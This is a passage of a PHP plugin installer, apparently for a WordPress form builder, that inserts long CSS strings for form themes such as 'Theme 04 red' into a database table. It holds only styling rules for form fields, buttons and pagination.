middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 20px;\r\n	height: 23px;\r\n	background-color: #678B94;\r\n	position: relative;\r\n	left: -14px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n	-moz-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-webkit-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-o-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-ms-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`id`, `title`, `css`, `default`) VALUES(15, \'Theme 04 red\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #CEE4E4;\r\nmargin-bottom: 10px;\r\ncolor: #CEE4E4;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 15px;\r\n	height: 15px;\r\n	top: -5px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n@font-face {\r\n	font-family: ArTarumianHandes;\r\n	src: url([SITE_ROOT]/css/HANDES.ttf);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #EDE5DA;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #8A6B63 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #8A6B63 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #8A6B63 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #8A6B63 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #8A6B63 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #8A6B63 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #8A6B63 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #E5E5E5 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 20px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 20px;\r\n	width: 22px;\r\n	background: url([SITE_ROOT]/images/04/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 45px;\r\n	height: 44px;\r\n	background: url([SITE_ROOT]/images/04/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #424242;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 35px;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-weight: 400;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n}\r\ndiv.wdform-page-button:hover {\r\ncolor: #fff;\r\nborder: 1px solid #C09F97;\r\nbackground: #86A0A7;\r\nbackground: -moz-linear-gradient(bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbackground: -webkit-linear-gradient(bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbackground: -o-linear-gradient(bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbackground: -ms-linear-gradient(bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbackground: linear-gradient(to bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbox-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-submit {\r\n	color: #767676 !important;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 32px;\r\n	padding: 0px 20px 5px;\r\n	vertical-align: middle;\r\n	font-weight: 400 !important;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n	font-family: Segoe UI;\r\nbackground:transparent;\r\n}\r\n.button-submit:hover {\r\ncolor: #fff !important;\r\nborder: 1px solid #C09F97;\r\nbackground: #86A0A7;\r\nbackground: -moz-linear-gradient(bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbackground: -webkit-linear-gradient(bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbackground: -o-linear-gradient(bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbackground: -ms-linear-gradient(bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbackground: linear-gradient(to bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbox-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #E0D0CD;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\nmargin: 16px 10px 16px 0px;\r\ndisplay: inline-block;\r\nbackground: url([SITE_ROOT]/images/04/03/bg.png) no-repeat;\r\ntext-align: left;\r\nborder-radius: 0px;\r\nwidth: 300px;\r\npadding: 5px 10px;\r\ntext-align: center;\r\nfont-size: 18px;\r\n}\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ccc;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus {\r\n	border-color: #8A6B63;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus {\r\n	border-color: #8A6B63;\r\n	outline: none;\r\n}\r\ntextarea:focus {\r\n	border-color: #8A6B63;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/04/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.radio-div label {\r\ncursor: pointer;\r\n-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: "";\r\nposition: absolute;\r\nwidth: 10px;\r\nheight: 10px;\r\nbackground: #B98476 ;\r\nbackground: -moz-linear-gradient(bottom, #CA9B8F 0%, #DBACA0 49%, #B98476 84%, #A38279 95%);\r\nbackground: -webkit-linear-gradient(bottom, #CA9B8F 0%, #DBACA0 49%, #B98476 84%, #A38279 95%);\r\nbackground: -o-linear-gradient(bottom, #CA9B8F 0%, #DBACA0 49%, #B98476 84%, #A38279 95%);\r\nbackground: -ms-linear-gradient(bottom, #CA9B8F 0%, #DBACA0 49%, #B98476 84%, #A38279 95%);\r\nbackground: linear-gradient(to bottom, #CA9B8F 0%, #DBACA0 49%, #B98476 84%, #A38279 95%);\r\nbox-shadow: 0px 0px 5px 0px rgb(214, 214, 214) inset;\r\nborder-radius: 7px;\r\ntop: 1px;\r\nleft: 1px;\r\nborder: 1px solid #9B766D;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 20px 0px 20px;\r\n	font-weight: bold;\r\n	background-color: #CCAAA3;\r\n	margin-left: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #8A6B63;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-left: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #8A6B63;\r\n	vertical-align: middle;\r\n	font-family: ArTarumianHandes;\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\n	background-color: #CCAAA3;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 20px;\r\n	height: 23px;\r\n	background-color: #8A6B63;\r\n	position: relative;\r\n	left: -14px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n	-moz-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-webkit-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-o-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-ms-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`id`, `title`, `css`, `default`) VALUES(16, \'Theme 04 transparent (gray button)\', \'.radio-div input[type="radio"],\r\n.checkbox-div input[type="checkbox"]\r\n{\r\nvisibility: hidden;\r\n}\r\n.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #FFFFFF;\r\nborder: 1px solid #A6A6A6;\r\nmargin-bottom: 10px;\r\ncolor: #A6A6A6;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 15px;\r\n	height: 15px;\r\n	top: -5px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n@font-face {\r\n	font-family: ArTarumianHandes;\r\n	src: url([SITE_ROOT]/css/HANDES.ttf);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #EDE5DA;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #B3B3B3 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #B3B3B3 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #B3B3B3 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #B3B3B3 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #B3B3B3 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #B3B3B3 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #B3B3B3 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #E5E5E5 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 20px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 20px;\r\n	width: 22px;\r\n	background: url([SITE_ROOT]/images/04/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	